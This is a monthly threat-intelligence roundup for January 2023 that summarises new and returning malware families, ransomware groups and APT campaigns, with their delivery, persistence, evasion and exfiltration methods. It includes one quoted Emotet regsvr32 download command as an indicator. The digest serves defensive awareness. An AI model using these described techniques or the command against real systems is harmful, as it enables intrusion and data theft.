Cyber Threat Breakdown January 2023

Cyber attackers from all corners of the world, embracing all types and motivations, began 2023 with a wide variety of attacks. Here is a navigable summary of their main activity this January.

Table of Contents:

The Newcomers

• Polyvice
• Linux.BackDoor.WordPressExploit.1 & 2
• YouTube Bot
• Unknown Info Stealer in Italy
• Earth Bogle
• NeedleDropper
• DragonSpark
• Microsoft OneNote

The Comebacks

• APT41 Ransomware
• IceID Malware
• Emotet poses as IRS
• Emotet, again!
• BlueBottle
• Aurora Stealer
• Play Ransomware
• Vice Society
• Dharma Ransomware

The Oldies

• BlindEagle
• Turla
• Gamaredon
• APT15

The Newcomers

Polyvice

Security experts have identified a new custom-branded ransomware payload used by the Vice Society group in recent intrusions. This new variant, named "PolyVice," features a robust hybrid encryption scheme that combines both asymmetric and symmetric encryption methods to securely encrypt files. The specific algorithms used in this payload are NTRUEncrypt and ChaCha20-Poly1305.

In recent attacks, the extension ".ViceSociety" was added to the encrypted file names, and the ransom note was placed in a file named "AllYFilesAE" in each encrypted directory. The codebase for the Windows payload has been reused to create custom-branded payloads for other threat groups, including "Chily" and "SunnyDay" ransomware. It is likely that an unknown developer or group of developers, specialized in ransomware development, is creating custom-branded payloads for multiple groups.

Vice Society group has also deployed third-party ransomware payloads in past intrusions, including HelloKitty, Five Hands, and Zeppelin.

Linux.BackDoor.WordPressExploit.1 & 2

Doctor Web, a cybersecurity firm, has discovered a malicious Linux program that hacks websites based on the WordPress CMS. The program, dubbed Linux.BackDoor.WordPressExploit.1, is able to exploit 30 vulnerabilities in a number of plugins and themes for the WordPress platform. If a website uses outdated versions of these add-ons, lacking crucial fixes, the targeted webpages are injected with malicious JavaScripts. As a result, when users click on any area of an attacked page, they are redirected to other sites.

The trojan is able to perform various actions such as attacking a specified webpage, switching to standby mode, shutting itself down, and pausing logging its actions. The main functionality of the trojan is to hack websites based on the WordPress CMS and inject a malicious script into their webpages. To do so, it uses known vulnerabilities in WordPress plugins and website themes.

The trojan collects statistics on its work, including the overall number of websites attacked, every case of a vulnerability being exploited successfully, and the number of times it has successfully exploited the WordPress Ultimate FAQ plugin and the Facebook messenger from Zotabox. In addition, it informs the remote server about all detected unpatched vulnerabilities.

A newer version of the trojan, Linux.BackDoor.WordPressExploit.2, has also been discovered. It differs from the original version by the C&C server address, the address of the domain from which the malicious JavaScript is downloaded, and also by an additional list of exploited vulnerabilities for various plugins.

Both trojan variants have been found to contain unimplemented functionality for hacking the administrator accounts of targeted websites through a brute-force attack, by applying known logins and passwords, using special vocabularies. It is possible that this functionality was present in earlier modifications, or that attackers plan to use it for future versions of this malware. This could potentially allow cybercriminals to successfully attack some websites that use current plugin versions with patched vulnerabilities.

YouTube Bot

A new malicious YouTube bot is capable of artificially boosting content on YouTube by viewing, liking, and commenting on videos, as well as subscribing to channels. It can also steal victims’ sensitive information, such as cookies, AutoFill, login data, and passwords. Upon receiving commands from a Command & Control server, it can download and execute additional malicious files.

The bot uses Windows Scheduled Tasks to establish persistence on the victims’ machine and uses a Mutex that starts with “sm” to ensure the malware is only running once.

South Korean Linux servers Targeted
External facing Linux servers located in South Korea were targeted by a sophisticated threat group utilizing a combination of tools, including a Shc (Shell Script Compiler) downloader, XMRig cryptocurrency miner, and a DDoS IRC botnet.

The attackers leveraged the XMRig miner to illicitly extract digital currency while also utilizing the botnet to perform various types of DDoS flood attacks, including TCP, UDP, and HTTP floods. Furthermore, the botnet was found to contain additional capabilities such as command execution, reverse shell, port scanning, and log deletion.

Unknown Info Stealer in Italy

In Italy, an unknown information stealer was delivered through an "Invoice" themed phishing campaign. The email contained a link to a malicious LNK file, which when clicked, downloaded a password-protected archive file containing a batch script and an additional LNK file. The LNK file, when executed, spawned a PowerShell command attempting to run a script file directly from a URL via the MSHTA binary. This led to the malware setting up persistence on the target machine and collecting crypto wallets, web browser data, and system information exfiltrated for later use.

Gootkit loader SEO attack against Australian Healthcare
The Australian healthcare industry was targeted by a cyber-attack utilizing the Gootkit loader malware delivered through Search Engine Optimization (SEO) poisoning. The attackers used keywords such as "agreement", "health", "medical", and "enterprise agreement" to target victims, who upon visiting the compromised website, would download the malware.

The attack had two phases: the first phase established persistence via a scheduled task, while the second stage used the Cobalt Strike beacon for Command and Control (C2) communication.

The attackers also used additional malware for reconnaissance and outbound connections to machines on the internal network.

Earth Bogle

Labeled Earth Bogle by the Trend Micro researchers that discovered them, the Earth Bogle cyber-attack targeted the Middle East and North Africa, attackers utilized Middle Eastern geopolitical lures to distribute njRAT malware.

The attackers utilized public cloud storage services to host the malware and employed compromised web servers to distribute the malicious remote access trojan. The attack's initial delivery mechanism involved a malicious CAB file, acting as the first stage loader, which was then followed by a PowerShell script injecting njRAT into the target system.

NeedleDropper

Avast's Threat Research Team has been monitoring a new strain of dropper malware referred to as "NeedleDropper." The name is derived from the way the malware stores data to be dropped into the victim's device.

The NeedleDropper contains multiple files used for both dropping and loading the malware, as well as for hiding its execution. To complicate analysis, the malware intermingles a large amount of irrelevant or unused data with the essential data for the malicious payload.

According to Avast's Threat Research Team, the developers behind NeedleDropper have adopted a "Malware-as-a-Service" business model and offer it for sale on hacking forums as a means for buyers to conceal their final payload.

DragonSpark

DragonSpark attacks on web servers and exposed MySQL database servers. The initial indicators of the attacks included use of the China Chopper webshell and a variety of malicious activities like lateral movement, privilege escalation, and deployment of malware and tools hosted at attacker-controlled infrastructure.

The threat actor relies heavily on open-source tools developed by Chinese developers or vendors, including SparkRAT, SharpToken, BadPotato, GotoHTTP, ShellCode_Loader and m6699.exe. SparkRAT is a RAT developed in Golang and supports Windows, Linux, and macOS operating systems.

It uses the WebSocket protocol to communicate with the C2 server and has an upgrade system to update itself to the latest version. The version of SparkRAT observed had 26 commands that allow for command execution, system manipulation, file and process manipulation, and information theft. The Golang malware m6699.exe uses the Yaegi framework to execute encoded Golang source code, hindering static analysis and evading detection. It establishes a Meterpreter session for remote command execution. The PyInstaller-packaged malware ShellCode_Loader, implemented in Python, serves as the loader of a reverse shell.

The malware uses encoding and encryption to hinder static analysis. The malware infrastructure includes compromised infrastructure of Taiwanese organizations and businesses and an Amazon Cloud EC2 instance.

Microsoft OneNote

BleepingComputer reports a phishing campaign using Microsoft OneNote attachments that aim to deploy remote access trojans (RATs) for malicious purposes such as stealing passwords and cryptocurrency. Threat actors are disguising the emails as DHL shipping notifications, invoices, and other forms and documents.

The attackers are exploiting OneNote, which does not support macros, to include malicious VBS attachments. When a user opens the attachment, a VBS script is executed which downloads and executes malware, as warned by OneNote.

BleepingComputer has observed the installation of AsyncRAT and XWorm RATs from malspam emails using this attack technique.

The Comebacks

APT41 Ransomware

APT41 unsuccessfully attempts to ransom a German financial institution
During the incident response engagement, the Data Incident Response Team (DIRT) performed a forensic analysis of multiple servers and workstations, determining that:

• The initial attack vector was a vulnerable “Microsoft Exchange Server”, that was compromised with the help of the ”ProxyLogon” exploit.
• The threat actor used a “China Chopper” web shell to persist on the compromised “Microsoft Exchange Server”.
• The threat actor laterally moved from the patient zero to a domain controller after performing initial credential dumping activities.
• The threat actor used a second domain controller as a “base” to stage his encryption attack against workstations and servers in the environment.
• The threat actor used “Jetico’s BestCrypt” for server encryption and “Microsoft Bitlocker” for the encryption of workstation.
• The threat actor accessed compromised systems through RDP by exposing the RDP port to the internet with the help of “NATBypass”.

IceID Malware

The banking trojan IceID malware hijacked Google PPC ads.
The attackers have been leveraging Google Pay-Per-Click (PPC) ads to distribute modified Dynamic Link Library (DLL) files, which act as a loader for the IcedID malware.

Upon searching for a popular keyword, victims may be directed to fake installers through hijacked ads, leading to downloads that mimic the intended search term. Once downloaded and executed, the modified DLL invokes the “init” export function to initiate the loader routine.

This method of using legitimate DLLs and modifying their functions to execute malicious tasks is a tactic used to evade detection from machine learning and whitelisting technologies. It also demonstrates the attackers’ ability to adapt to security detection strategies.

Emotet poses as IRS

A phishing campaign that is targeting the USA Internal Revenue Service (IRS)  was conducted by the Emotet group using a compromised email account in Pakistan.

The phishing email appears to be from the United States IRS and includes two attachments with the subject "IRS Tax Forms K-1". The attachments are password-protected, and when unpacked, the file copies into the "Templates" directory and later relaunch the file.

The attachments contain a malicious Excel 4.0 macro that executes within an unprotected workbook. The macro contains a URL fragment used to download additional payloads. The Emotet payload is downloaded via regsvr32.exe using the command "%WINDIR%System32regsvr32.exe /S ..oxnv[n].ooccxx".

Emotet is a DLL file that utilizes anti-analysis and debugging methods, and it has over 270 export functions. Once Emotet is running on the victim's machine, it attempts to contact command and control (C2) server nodes in order to receive further instructions and deliver stolen information.

Emotet, again!

Recently, Emotet has added an SMB spreader module for lateral movement and a module to target a victim's Google Chrome browser to steal credit card information. To load its modules, Emotet uses the Heaven's Gate injection technique to bypass security measures. The latest wave of Emotet spam emails have a new method to trick users into downloading the dropper, and Emotet variants have moved from 32-bit to 64-bit to evade detection.

BlueBottle

Bluebottle (AKA Opera1er, Nxsms, Desktop-Group), is a threat actor targeting the financial sector in French-speaking countries in Africa.

Their latest phishing attacks use a combination of spear phishing attacks and fake job opportunities lure, to deliver malware like NanoCore RAT, Cybergate, Adwind, WSH-RAT, and Houdini.

Their known operational methods include using Netwire, Quasar RATs, Cobalt Strike, GuLoader, Mimikatz, and multiple Microsoft Windows command-line utilities.

Aurora Stealer

A recent threat actor was uncovered utilizing tactics such as mimicking legitimate websites to host and deliver the 9002 RAT, also known as Aurora Stealer, Hydraq, and McRat. The malware employed techniques such as binary padding, system checks, and obfuscation in an attempt to evade detection from antivirus software.

Aurora Stealer, first advertised as a Malware-as-a-Service (MaaS) on Russian-speaking underground forums in April 2022, is a Golang-based information stealer with downloading and remote access capabilities. The malware targets diverse types of data, including system information, data from web browsers, crypto wallets, and specific user directories.

During execution, the malware collects basic host information through the execution of various WMIC commands, captures a screenshot, and exfiltrates the stolen data to a C2 server in the form of a single base64-encoded JSON file.

Play Ransomware

The Play Ransomware (AKA PlayCript) employs various techniques to evade detection and complicate analysis. It uses return-oriented programming to bypass static analysis and obscures important strings in memory. It initializes and retrieves cryptographic algorithm providers, then encrypts files by generating an AES key, calling BCryptGenRandom to generate a random buffer, and setting the chaining mode. The encryption process avoids the Windows directory, and the default chaining mode is set to AES-GCM, but changes to AES-CBC if the file size is greater than a certain threshold. The malware enumerates volumes on the victim's system to determine which to encrypt, and the final drive path to be encrypted is set to the network drive's universal or connection name.

Vice Society

The Vice Society threat group has been identified as a cybercriminal organization targeting a variety of sectors, including manufacturing companies in Brazil. It has been active since 2021, utilizing various ransomware variants such as Hello Kitty, Five Hands, and Zeppelin. However, in late 2022, the group developed their own custom ransomware called PolyVice. This malware not only encrypts files but also steals sensitive data and deletes volume shadow copies, making it harder for victims to recover their data.

Dharma Ransomware

Dharma ransomware is a form of malware that encrypts a target's files and requires payment in exchange for the decryption key. It is a variation of the CrySIS ransomware family first discovered in 2016, typically spread through phishing emails, software vulnerabilities, or exploit kits. The ransomware appends a ".dharma" or “. wallet" extension to the file name after encryption and displays a ransom note asking for payment in Bitcoin. However, paying the ransom does not guarantee file recovery and experts advise against it, suggesting instead to restore from backups or use decryption tools. To prevent infections, it is crucial to keep software up to date, practice safe browsing, and be aware that the Dharma ransomware actors may use double extortion tactics, which means they not only encrypt files but also steal and threaten to publicize sensitive information if the ransom is not paid.

The Oldies

BlindEagle

BlindEagle, AKAAPT-C-36, is a financially motivated threat group known since 2018 for launching indiscriminate attacks against citizens of various countries in South America. It has recently been conducting a targeted phishing campaign against victims in Columbia and Ecuador, using QuasarRAT malware, delivered through a series of spear-phishing emails.

The emails, purporting to be from the Colombian and Ecuadorian governments, contain both a shortened URL link and a PDF attachment, both of which lead to a compressed and password-protected file with an LHA extension. Once downloaded, the malware is unpacked and deployed to the victim's machine, with the infection process being terminated if the request is made from a machine outside of Colombia.

In an additional, more elaborate campaign, Ecuador and Columbia were again targeted with phishing emails, this time made to appear as if they were from the Ecuadorian government. This campaign involved delivering a RAR file containing an executable python file. This file would spawn the Windows binary MSHTA to retrieve additional payloads, including scripts that would perform system checks, disable anti-malware/behavior detection software, and ultimately load an in-memory Meterpreter payload.

Turla

The Turla APT group (AKA Snake, VENOMOUS Bear, Group 88, Waterbug, WRAITH, Uroburos, Pfinet, TAG_0530, KRYPTON, Hippo Team, Pacifier APT, Popeye, SIG23, IRON HUNTER, MAKERSMARK, ATK13, G0010, ITG12, Blue Python), known for targeting government entities and embassies, was found to be using variants of the Andromeda, KopiLuwak, and QUIETCANARY malware families to infiltrate systems in Ukraine. These tools were used to create a backdoor, perform reconnaissance, and exfiltrate data to the attackers' command-and-control servers.

The group has been known to target embassies in Eastern Bloc nations and has been linked to attacks on the offices of a former Soviet Union member country's prime minister and government entities in Western Europe, Central America, the Middle East, and the United States. The group's use of encryption has made it difficult to determine the extent of their data exfiltration. Attribution to the group is difficult, but it has been suspected to be linked to Russian state-sponsored actors.

Gamaredon

The Gamaredon APT group (AKA ACTINIUM, DEV-0157, Blue Otso, BlueAlpha, G0047, IRON TILDEN, PRIMITIVE BEAR, Shuckworm, Trident Ursa, UAC-0010, Winterflounder) was detected targeting Ukrainian government organizations by utilizing the Telegram messaging service to evade conventional network detection methods.

The Telegram application was utilized throughout various stages of the attack, from victim profiling to delivering the final payload. The initial method of infection involved weaponized spear-phishing documents written in Russian and Ukrainian languages.

The threat actor leveraged a remote template injection vulnerability to infect adversary infrastructure with malware and bypass macro protection in Microsoft Word. Upon opening the malicious document, the malware downloads a Visual Basic script from a designated address, connecting to a Telegram account to receive further instructions.

APT15

APT15  (AKA Vixen Panda, Ke3chang, Playful Dragon, Metushy, Lurid, Social Network Team, Royal Apt, Bronze Palace, Bronze Davenport, Bronze Idlewood, Nickel, G0004, or Red Vulture) is a sophisticated cyber threat group that operates globally and conducts various cyber operations.

The group was recently seen targeting Iranian telecommunications and diplomatic sectors using the Turian backdoor. This malware is equipped with VMProtect, making it challenging to analyze, and includes multiple functions such as launching reverse shells and executing commands from its command-and-control server.